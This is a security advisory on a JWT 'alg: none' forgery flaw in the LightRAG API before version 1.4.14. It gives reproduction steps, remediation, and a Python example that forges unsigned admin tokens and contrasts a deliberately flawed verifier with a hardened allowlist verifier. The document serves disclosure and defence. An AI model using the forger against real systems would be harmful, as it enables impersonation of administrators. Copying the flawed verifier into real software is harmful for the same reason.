LightRAG JWT Algorithm Confusion Vulnerability Allowing Token Forgery and Unauthorized Access

Vulnerability

A JWT algorithm confusion vulnerability has been identified in the LightRAG API prior to version 1.4.14. An attacker can forge tokens by setting 'alg': 'none' in the JWT header. The vulnerability arises because the jwt.decode() call does not explicitly reject the 'none' algorithm, so a crafted token with an empty signature segment is accepted as valid. As a result, attackers can gain unauthorized access to protected resources.

Impact

Exploitation of this vulnerability allows attackers to impersonate any user, including administrators, by forging JWTs with 'alg': 'none'. This grants full access to protected resources without valid credentials.

Reproduction

To reproduce, generate a JWT whose header sets 'alg' to 'none', whose payload claims a privileged role such as 'admin', and whose signature segment is empty. Send a request to a protected endpoint with the forged JWT in the Authorization header as a Bearer token. A vulnerable instance accepts the request and grants access to the protected resource, demonstrating the vulnerability.

Remediation

Users are advised to update to LightRAG version 1.4.14 or later. When implementing JWT validation, pass an explicit allowlist of accepted algorithms to the decoder (for PyJWT, the algorithms argument of jwt.decode()) and never include 'none' in it; the token header must not be allowed to select the algorithm that verifies it.
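The reproduction and the remediation above, as one added worked example. This is not LightRAG's code: it is a small standard-library JWT forger plus two hypothetical verifiers. decode_vulnerable stands in for the flawed pattern (the token header chooses the algorithm, so 'none' skips signature verification); decode_hardened applies the fix (a server-side allowlist that never contains 'none'). The secret, claims and function names are constructed for the example.

```python
import base64
import hashlib
import hmac
import json


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _signing_input(header: dict, payload: dict) -> str:
    return ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )


def _hs256(secret: bytes, signing_input: str) -> bytes:
    return hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a legitimately signed token, as the server would."""
    signing_input = _signing_input({"alg": "HS256", "typ": "JWT"}, payload)
    return f"{signing_input}.{_b64url_encode(_hs256(secret, signing_input))}"


def forge_none_token(payload: dict, alg: str = "none") -> str:
    """Attacker side: no secret needed. Per RFC 7518 the 'none' algorithm has an
    empty signature segment, so the token ends with a trailing dot. The alg
    parameter lets a tester try spelling variants such as 'None'."""
    return _signing_input({"alg": alg, "typ": "JWT"}, payload) + "."


def decode_vulnerable(token: str, secret: bytes) -> dict:
    """Hypothetical flawed verifier: the token header chooses the algorithm,
    and 'none' short-circuits signature verification."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    payload = json.loads(_b64url_decode(payload_b64))
    if header.get("alg") == "none":
        return payload  # accepted unsigned: this is the bug
    if not hmac.compare_digest(_hs256(secret, f"{header_b64}.{payload_b64}"),
                               _b64url_decode(sig_b64)):
        raise ValueError("invalid signature")
    return payload


def decode_hardened(token: str, secret: bytes, algorithms=("HS256",)) -> dict:
    """Fixed verifier: a server-side allowlist decides which algorithms are
    acceptable; the header is only checked against it, never trusted."""
    if any(a.lower() == "none" for a in algorithms):
        raise ValueError("'none' must never be an allowed algorithm")
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    alg = header.get("alg")
    # Exact-match allowlist: 'none', 'None', 'NONE' and a missing alg all fail here.
    if alg not in algorithms:
        raise ValueError(f"algorithm {alg!r} not allowed")
    if alg != "HS256":
        raise ValueError(f"no verifier for {alg!r}")  # only HS256 is implemented here
    if not hmac.compare_digest(_hs256(secret, f"{header_b64}.{payload_b64}"),
                               _b64url_decode(sig_b64)):
        raise ValueError("invalid signature")
    return json.loads(_b64url_decode(payload_b64))


def accepts(decoder, token: str, secret: bytes) -> bool:
    """True if the decoder returns a payload, False if it rejects the token."""
    try:
        decoder(token, secret)
        return True
    except ValueError:  # covers bad base64, bad JSON, bad split and our own errors
        return False


if __name__ == "__main__":
    secret = b"constructed-example-secret"  # constructed for the example, not a real key
    forged = forge_none_token({"sub": "attacker", "role": "admin"})
    legit = sign_hs256({"sub": "alice", "role": "user"}, secret)
    print("forged token:", forged)
    print("vulnerable accepts forged:", accepts(decode_vulnerable, forged, secret))  # True
    print("hardened accepts forged: ", accepts(decode_hardened, forged, secret))    # False
    print("hardened accepts legit:  ", accepts(decode_hardened, legit, secret))     # True
```

The forged token carries no signature and is built without any knowledge of the server secret; the only thing that stops it is the verifier refusing to let the header pick the algorithm. With PyJWT the equivalent of decode_hardened is jwt.decode(token, key, algorithms=["HS256"]), where the list is fixed in server configuration and 'none' never appears in it.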

Added: Apr 8, 2026, 10:44 PM
Updated: Apr 8, 2026, 10:44 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 8.7
remediation: 0.0
relevance: 5.5
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.